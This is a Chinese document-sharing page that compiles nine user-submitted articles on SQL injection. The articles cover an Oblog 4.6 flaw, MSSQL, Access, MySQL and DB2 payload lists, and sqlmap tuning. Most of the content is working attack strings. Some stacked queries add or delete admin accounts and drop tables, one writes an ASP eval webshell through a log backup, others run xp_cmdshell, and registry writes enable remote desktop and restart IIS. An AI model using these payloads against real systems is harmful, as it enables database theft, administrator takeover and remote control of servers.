当前位置：首页 > 实用文档 > 其他范文> oblog?4.6?注入的语句

oblog?4.6?注入的语句

时间：2023-08-25 08:17:39 其他范文收藏本文下载本文

oblog?4.6?注入的语句（集锦9篇）由网友“沮丧小猪”投稿提供，下面是小编给大家带来oblog?4.6?注入的语句，一起来阅读吧，希望对您有所帮助。

oblog?4.6?注入的语句

篇1：Oblog注入漏洞分析(已修补)

style=“display:block;padding:0px 10px;” class=“ContentFont”>Date：-5-15 Author：Yamato[BCT] Version：Oblog 4.5-4.6 sql 代码分析：文件In/Class_UserCommand.asp : strMonth=Request(“month”) //第63行 strDay=Request(“day”) …… Case “month” //第84行 Dim LastDay G_P_FileName = G_P_FileName & “month&month=” & strMonth strDay=Left(strMonth,4) & “-” & Right(strMonth,2) & “-01” mYear=Left(strMonth,4) mMonth=Right(strMonth,2) If InStr (“01,03,05,07,08,10,12”,mMonth)> 0 Then LastDay = “31”…… Else //第109行 SqlPart = “ And Addtime >=’”&strMonth&“01’ AND Addtime < ’”&strMonth&LastDay&“’ ” 构造合适的变量strMonth进行注射测试方法: localhost/oblog/cmd.asp?do= month&month=2008’ and user>0--01 strDay变量从month中获得日期数据，并判断strDay是否为日期数据，

Oblog最新注入漏洞分析(已修补)

，

所以构造的注射语句为： localhost/oblog/cmd.asp?do= month&month=2008’(自己的sql语句)--01 执行sql语句采用rst.Open strSql,Conn,1,1 不能修改记录集.

篇2：SQL注入语句

ID=1458%20and%20@@version%3D0 判断版本

ID=1458%20and%20db_name%28%29%3D0 数据库名

ID=1458%20and%20@@servername%3D0 服务器名

ID=1458%20and%20system_user%3D0 系统用户名

D=1458%20and%20user%3D0 权限/DBO OR PUBLIC

ID=1458%20and%20quotename%28is_srvrolemember%280x730079007300610064006D0069006E00%29%29%3D0 是否sysadmin,1是0否

ID=1458%20and%20quotename%28db_name%281%29%29%3D0 判断数据库

ID=1458%20and%20quotename%28db_name%282%29%29%3D0

ID=1458%20and%20quotename%28db_name%283%29%29%3D0

ID=1458%20and%20%28select%20top%201%20quotename%28name%29%20from%20Digicom.dbo.sysobjects%20where%20type%3Dchar%2885%29%20AND%20name%20not%20in%20%28select%20top%2032%20name%20from%20Digicom.dbo.sysobjects%20where%20type%3Dchar%2885%29%29%29%3D0

ID=1458%20and%20%28select%20top%201%20quotename%28name%29%20from%20Digicom.dbo.sysobjects%20where%20type%3Dchar%2885%29%20AND%20name%20not%20in%20%28select%20top%2033%20name%20from%20Digicom.dbo.sysobjects%20where%20type%3Dchar%2885%29%29%29%3D0

解密之后就是:

ID=1458 and (select top 1 quotename(name) from Digicom.dbo.sysobjects where type=U AND name not in (select top 33 name from Digicom.dbo.sysobjects where type=U))=0

下面是pangolin的:

/add_item.asp?ID=1458%20and%200<(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([filename]%20as%20nvarchar(4000))%20from(select%20top%20%201%20dbid,name,filename%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid])%20t%20order%20by%20[dbid]%20desc)--%20and%201=1

得到数据库文件的路径.

篇3：or注入的利用和语句

我记得一年前火狐有一位朋友问,如果一个站过滤了and和“'”的话，改怎么注入啊？当时我随口说了句“or注入”，后来又一次看贴的时候，看到他问我该怎么利用呢？我就写了几个简单的语句给他，叫他自己变换，他很感激我，还说网上没有这种方法，我到网上查了查，还真没有or注入专题呢（or 1=1除外），呵呵，所以，一年后的今天，就有了这篇文章。

我们用雷霆购物系统做or注入演示。我们先用or 1=1和or 1=2来测试是否存在注入点，我们先来看正常页面的面貌。我们现在用or 1=1测试是否存在注入漏洞。返回的是另外一个页面，我们再来测试or 1=2。返回的是正常的页面，说明猜测正确的时候是错误，猜测错误的时候是正常，这就是真正的“假是真时真是假”，比lake2大哥哥的IP欺骗更经典哦，呵呵。

我们来构造测试语句：

Copy code

vpro.asp?id=1 or exists(select * from admin)

返回错误页面，说明存在admin表我们来换一个表试试！

Copy code

vpro.asp?id=1 or exists(select * from n0h4ck)

说明不存在n0h4ck这个表。

我们继续来，构造语句

Copy code

vpro.asp?id=1 or exists(select admin from admin)

返回or 1=1的页面，说明admin表存在admin字段，

电脑资料

Copy code

vpro.asp?id=1 or exists(select padd from admin)

返回or 1=2的页面，说明admin表不存在padd字段。

我们现在开始猜测数据了，

Copy code

vpro.asp?id=1 or (select mid(admin,1,1) from admin)='n'

返回or 1=2的页面，说明admin表admin字段的第一个数据的第一个字符不是“n”。

我们再来

Copy code

vpro.asp?id=1 or (select mid(admin,1,1) from admin)='a'

返回or 1=1的页面，说明说明admin表admin字段的第一个数据的第一个字符是“a”，我们第一个会想到什么呢？当然是“admin”啦。

我们用left函数确定一下,

Copy code

vpro.asp?id=1 or (select left(admin,5) from admin)='admin'

猜测正确，的确是admin，好了，后面的话就不用我说了吧！

篇4：常用的注入语句总结

注入经典语句总结 ' or 1=1 ' or '1=1 '/* '%23 ' and password='mypass id=-1 union select 1,1,1 id=-1 union select char(97),char(97),char(97) id=1 union select 1,1,1 from members id=1 union select 1,1,1 from admin id=1 union select 1,1,1 from

篇5：经典的注入语句归总

注入经典语句总结

' or 1=1

' or '1=1

'/*

'%23

' and password='mypass

id=-1 union select 1,1,1

id=-1 union select char(97),char(97),char(97)

id=1 union select 1,1,1 from members

id=1 union select 1,1,1 from admin

id=1 union select 1,1,1 from user

userid=1 and password=mypass

userid=1 and mid(password,3,1)=char(112)

userid=1 and mid(password,4,1)=char(97)

and ord(mid(password,3,1))>111 （ord函数很好用，可以返回整形的）

' and LENGTH(password)='6（探测密码长度）

' and LEFT(password,1)='m

' and LEFT(password,2)='my

…………………………依次类推

' union select 1,username,password from user/*

=' union select 1,username,password from user/* （可以是1或者=后直接跟）

99999' union select 1,username,password from user/*

' into outfile 'c:/file.txt （导出文件）

=' or 1=1 into outfile 'c:/file.txt

1' union select 1,username,password from user into outfile 'c:/user.txt

SELECT password FROM admins WHERE login='John' INTO DUMPFILE '/path/to/site/file.txt'

id=' union select 1,username,password from user into outfile

id=-1 union select 1,database,version() （灵活应用查询）

常用查询测试语句，

SELECT * FROM table WHERE 1=1

SELECT * FROM table WHERE 'uuu'='uuu'

SELECT * FROM table WHERE 12

SELECT * FROM table WHERE 3>2

SELECT * FROM table WHERE 2<3

SELECT * FROM table WHERE 1

SELECT * FROM table WHERE 1+1

SELECT * FROM table WHERE 1--1

SELECT * FROM table WHERE ISNULL(NULL)

SELECT * FROM table WHERE ISNULL(COT(0))

SELECT * FROM table WHERE 1 IS NOT NULL

SELECT * FROM table WHERE NULL IS NULL

SELECT * FROM table WHERE 2 BETWEEN 1 AND 3

SELECT * FROM table WHERE 'b' BETWEEN 'a' AND 'c'

SELECT * FROM table WHERE 2 IN (0,1,2)

SELECT * FROM table WHERE CASE WHEN 1>0 THEN 1 END

例如：夜猫下载系统1.0版本

id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1

id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1

union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 （替换，寻找密码）

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49 （验证第一位密码）

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1))=50 （第二位）

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,3,1))=51

…………………………………………………………

例如2：灰色轨迹变换id进行测试（meteor）

union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%)%20order%20by%20eventdate

union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',pass(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%)%20order%20by%20eventdate

构造语句：

SELECT allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid = 1 union (select 1,1,1,1,1,1,1 from user where userid=1)

SELECT allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid = 1 union (select 1,1,1,1,username,password from user where userid=1)

UNION%20(SELECT%201,0,2,'-01-01','a',password%20FROM%20user%20WHERE%20userid%20=%205)%20order%20by%20eventdate

UNION%20(SELECT%201,0,12695,'1999-01-01','a',password%20FROM%20user%20WHERE%20userid=13465)%20order%20by%20eventdate

UNION%20(SELECT%201,0,12695,'1999-01-01','a',userid%20FROM%20user%20WHERE%20username='sandflee')%20order%20by%20eventdate （查沙子的id）

（SELECT a FROM table_name WHERE a=10 AND B=1 ORDER BY a LIMIT 10)

SELECT * FROM article WHERE articleid='$id' UNION SELECT * FROM……（字段和数据库相同情况下，可直接提交）

SELECT * FROM article WHERE articleid='$id' UNION SELECT 1,1,1,1,1,1,1 FROM……（不同的情况下）

特殊技巧：在表单，搜索引擎等地方写：

“___”

“.__ ”

“%

%' ORDER BY articleid/*

%' ORDER BY articleid#

__' ORDER BY articleid/*

__' ORDER BY articleid#

$command = “dir c:”;system($command);

SELECT * FROM article WHERE articleid='$id'

SELECT * FROM article WHERE articleid=$id

1' and 1=2 union select * from user where userid=1/* 句中变为

(SELECT * FROM article WHERE articleid='1' and 1=2 union select * from user where userid=1/*')

1 and 1=2 union select * from user where userid=1

语句形式：建立一个库，插入：

CREATE DATABASE `injection`

CREATE TABLE `user` (

`userid` int(11) NOT NULL auto_increment,

`username` varchar(20) NOT NULL default '',

`password` varchar(20) NOT NULL default '',

PRIMARY KEY (`userid`)

) ;

INSERT INTO `user` VALUES (1, 'swap', 'mypass');

插如一个注册用户：

INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');

“INSERT INTO membres (login,password,nom,email,userlevel) VALUES ('$login','$pass','$nom','$email','1')“;

INSERT INTO membres (login,password,nom,email,userlevel) VALUES ('','','','','3')#','1')

”INSERT INTO membres SET login='$login',password='$pass',nom='$nom',email='$email'“;

INSERT INTO membres SET login='',password='',nom='',userlevel='3',email=''

”INSERT INTO membres VALUES ('$id','$login','$pass','$nom','$email','1')“;

UPDATE user SET password='$password', homepage='$homepage' WHERE id='$id'

UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'

”UPDATE membres SET password='$pass',nom='$nom',email='$email' WHERE id='$id'“;

UPDATE membres SET password='[PASS]',nom='',userlevel='3',email=' ' WHERE id='[ID]'

”UPDATE news SET Votes=Votes+1, score=score+$note WHERE idnews='$id'“;

长用函数：

DATABASE()

USER()

SYSTEM_USER()

SESSION_USER()

CURRENT_USER()

比如：

UPDATE article SET title=$title WHERE articleid=1 对应函数

UPDATE article SET title=DATABASE() WHERE id=1

#把当前数据库名更新到title字段

UPDATE article SET title=USER() WHERE id=1

#把当前 MySQL 用户名更新到title字段

UPDATE article SET title=SYSTEM_USER() WHERE id=1

#把当前 MySQL 用户名更新到title字段

UPDATE article SET title=SESSION_USER() WHERE id=1

#把当前 MySQL 用户名更新到title字段

UPDATE article SET title=CURRENT_USER() WHERE id=1

#把当前会话被验证匹配的用户名更新到title字段

：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：

$req = ”SELECT * FROM membres WHERE name LIKE '%$search%' ORDER BY name“;

SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid#%' ORDER BY name

SELECT uid FROM admins WHERE login='' OR 'a'='a' AND password='' OR 'a'='a' （经典）

SELECT uid FROM admins WHERE login='' OR admin_level=1#' AND password=''

SELECT * FROM table WHERE msg LIKE '%hop'

SELECT uid FROM membres WHERE login='Bob' AND password LIKE 'a%'#' AND password=''

SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid#%' ORDER BY name

篇6：oblog 4.6 注入的语句

oblog 4.6 注入的语句

s'/**/WHERE/**/logid=21949;delete/**/from/**/oblog_syslog/**/where/**/

username='duyao';--删除指定用户日志

s'/**/WHERE/**/logid=21949;insert/**/into/**/oblog_admin/**/

(username,password,roleid)values('duyao','00b1d1380814062d',0);-- 添加指定用

户

s'/**/WHERE/**/logid=21949;delete/**/from/**/oblog_admin/**/where/**/

username='duyao';-- 删除指定用户

备份获得webshell

s'/**/WHERE/**/logid=21949;Drop/**/table/**/cmd;--

s'/**/WHERE/**/logid=21949;create/**/table/**/cmd/**/(a/**/image);--

s'/**/WHERE/**/logid=21949;backup/**/log/**/hh/**/to/**/disk/**/=/

**/'c:\zj1244'/**/with/**/init;--

s'/**/WHERE/**/logid=21949;insert/**/into/**/cmd/**/(a)/**/

values(0x3C256576616C2072657175657374286368722833352929253E);--

s'/**/WHERE/**/logid=21949;backup/**/log/**/hh/**/to/**/disk/**/=/

**/'c:\a\a\';--

s'/**/WHERE/**/logid=21949;Drop/**/table/**/cmd;--

s'/**/WHERE/**/logid=21949;s' WHERE logid=1;update oblog_user set

useremail=db_name() where username='duyao';--

篇7：DB2数据库SQL注入语句

以下均是是整形的注入，采用半折法猜解

猜用户表数量：

and 0<(SELECT count(NAME) FROM SYSIBM.SYSTABLES where CREATOR=USER)

猜表长度：

and 3<(SELECT LENGTH(NAME) FROM SYSIBM.SYSTABLES where name not in(’COLUMNS’) fetch first 1 rows only)

猜表第一个字符ASCII码：

and 3<(SELECT ASCII(SUBSTR(NAME,1,1)) FROM SYSIBM.SYSTABLES where name not in(’COLUMNS’) fetch first 1 rows only)

猜表内列名数量：

and 1<(SELECT COUNT(COLNAME) FROM SYSCAT.columns where TABNAME=’TABLE‘)

猜第一个列名的长度

and 1<(SELECT LENGTH(COLNAME) FROM SYSCAT.columns where TABNAME=’TABLE‘ and colno=0)

猜第一个列名第一个字符的ASCII码

and 1<(SELECT ASCII(SUBSTR(COLNAME,1,1)) FROM SYSCAT.columns where TABNAME=’TABLE‘ and colno=0)

依ID排降序，猜第一个PASSWD的长度

and 0<(SELECT LENGTH(PASSWD) FROM TABLE ORDER BY ID DESC FETCH FIRST 1 ROWS ONLY)

依ID排降序，猜第一个PASSWD第一个字符的ASCII码

and 0<(SELECT ASCII(SUBSTR(PASSWD,1,1)) FROM TABLE ORDER BY ID DESC FETCH FIRST 1 ROWS ONLY)

猜第二个PASSWD第一个字符的ASCII码

and 0<(SELECT ASCII(SUBSTR(PASSWD,1,1)) FROM TABLE where PASSWD not in(’grou1‘) fetch first 1 rows only)

篇8：sql注入部分抓包分析语句

hdsi2.0 sql注入部分抓包分析语句如下：

恢复cmd

;insert tb1 exec master..xp_cmdshell'net user '--

;exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--

执行命令：

sql: ;ipconfig -all--

dos：

;Drop table comd_list ;Create TABLE comd_list (ComResult nvarchar(1000)) Insert comd_list EXEC MASTER..xp_cmdshell

”ipconfig

-all“--

GET /plaza/event/new/crnt_event_view.asp?event_id=57

And (Select char(94)+Cast(Count(1) as varchar(8000))+char(94) From [comd_list] Where 1=1)>0

列目录：

c: jiaozhu 临时表

;drop table jiaozhu;Create TABLE jiaozhu(DirName VARCHAR(100), DirAtt VARCHAR(100),DirFile VARCHAR(100)) Insert jiaozhu

EXEC

MASTER..XP_dirtree ”c:“,1,1--

GET /plaza/event/new/crnt_event_view.asp?event_id=57

And (Select char(94)+Cast(Count(1) as varchar(8000))+char(94) From [jiaozhu] Where 1=1)>0

上传文件：

本地路径：C:\Inetpub\wwwroot\cook.txt 保存位置：c：

数据库存储过程：

;exec master..xp_cmdshell ' echo

cdb_sid=3UrzOV;%20cdb_cookietime=259;%20cdb_auth=VgcCBAJbVQxVAVMCVghTBFJUUQYDBQdTV1BWVQoKAQE6PwNX;%

20cdb_visitedfid=12;%2

0cdb_oldtopics=D8D>c:\'--

数据库备份：(上传后删除临时表)

;Drop table [xiaopan];create table [dbo].[xiaopan] ([cmd] [text])--

;insert into xiaopan(cmd) values(' echoStr ')--

;declare @a sysname,@s nvarchar(4000) select @a=db_name,@s='c:/' backup database @a to disk=@s WITH

DIFFERENTIAL,FORMAT--

;Drop table [xiaopan]--

开启3389：

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite

@r,'software\microsoft\windows\currentversion\netcache','enable','reg_sz','0';-

---

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'software\microsoft\windows

nt\currentversion\winlogon','shutdownwithoutlogon','reg_sz','0';----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite

@r,'software\policies\microsoft\windows\installer','enableadmintsremote','reg_dword',1;----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'system\currentcontrolset\control

\terminal

servert','senabled','reg_dword',1;----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite

@r,'system\currentcontrolset\services\termdd','start','reg_dword',2;----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite

@r,'system\currentcontrolset\services\termservice','start','reg_dword',2;----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite 'hkey_users','.default\keyboard

layout\toggle','hotkey','reg_sz','1';----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_cmdshell 'iisreset /reboot';----

注入分析：数字型 SQL错误提示关闭开启 access

多句查询支持

子查询支持

权限 public

当前用户 dbo

当前库 event

;create table t_jiaozhu(jiaozhu varchar(200))

And 1=1

And 1=2

And (Select Count(1) from SYSObjects)>0

and (select len(user))<32

;declare @a int--

And (IS_SRVROLEMEMBER('sysadmin'))=1

And (IS_MEMBER('db_owner'))=1

and (select len(user))<16

and (select len(user))<4

and (select len(user))<2

and (select len(user))<3

and (select len(user))<4

and (select ascii(substring(user,1,1)))<80

and (select ascii(substring(user,2,1)))<80

and (select ascii(substring(user,3,1)))<80

and (select ascii(substring(user,1,1)))<104

and (select ascii(substring(user,2,1)))<104

and (select ascii(substring(user,3,1)))<104

and (select ascii(substring(user,1,1)))<92

and (select ascii(substring(user,2,1)))<92

and (select ascii(substring(user,3,1)))<116

and (select ascii(substring(user,1,1)))<98

...

and (select len(db_name()))<16

and (select len(db_name()))<8

and (select len(db_name()))<4

...

and (select ascii(substring(db_name(),1,1)))<80

and (select ascii(substring(db_name(),2,1)))<80

and (select ascii(substring(db_name(),5,1)))<85

跨库：

篇9：自定义sqlmap注入语句进行高级注入脚本安全

现在能够帮助我们进行sql注入检测的工具越来越多，但我认为，通用性最强的还是sqlmap，其他工具在灵活性上远远不及sqlmap，sql注入有许多类型，其中最喜欢的当然是能够union查询的，比blind类型的不知道爽到哪里去了。

现在有一个url已知存在sql注入漏洞，我们丢到sqlmap里面，跑一下，结果是这样的

sqlmap -u ”www.ooxx.com/ooxx.php?xid=93&dxxx=news&action=find&ppid=2“ -p ppid

很明显，是一些比较恶心的注入类型，bind和error-based，难道我们就只能听工具的了么，我们手动来看一看。sq报错如下

MySQL Error

Message: MySQL Query Error

SQL: select ..... and pass=0 and (c.catid=2\' or c.parentid=2\') and subject like '%%'

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' or c.parentid=2\') and subject like '%%'' at line 4

Errno.: 1064

Click here to seek help.

报错显示，这里懂sql语句有点复杂并且不是常规懂类型，需要闭合括号还有最好屏蔽掉后面的like语句，构造一下

www.ooxx.com/ooxx.php?xid=93&dxxx=news&action=find&ppid=2) order by 15 --

www.ooxx.com/ooxx.php?xid=93&dxxx=news&action=find&ppid=2) order by 16 --

order by确认了查出来懂总共16条，那么，继续试试

www.ooxx.com/ooxx.php?xid=93&dxxx=news&action=find&ppid=2) and 1=2 union% select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15 --

手工确认之后，使用sqlmap来继续进行，我们需要用到sqlmap的两个选项，suffix和prefix，添加以下语句的前缀和后缀，

sqlmap -u ”www.ooxx.com/ooxx.php?xid=93&dxxx=news&action=find&ppid=2“ -p catid --suffix=” -- “ --prefix=”)"

成功自定义了注入的语句，出现来union类型的注入。

★ 四年级《渡船》教学片断评析

★ 中学电教工作计划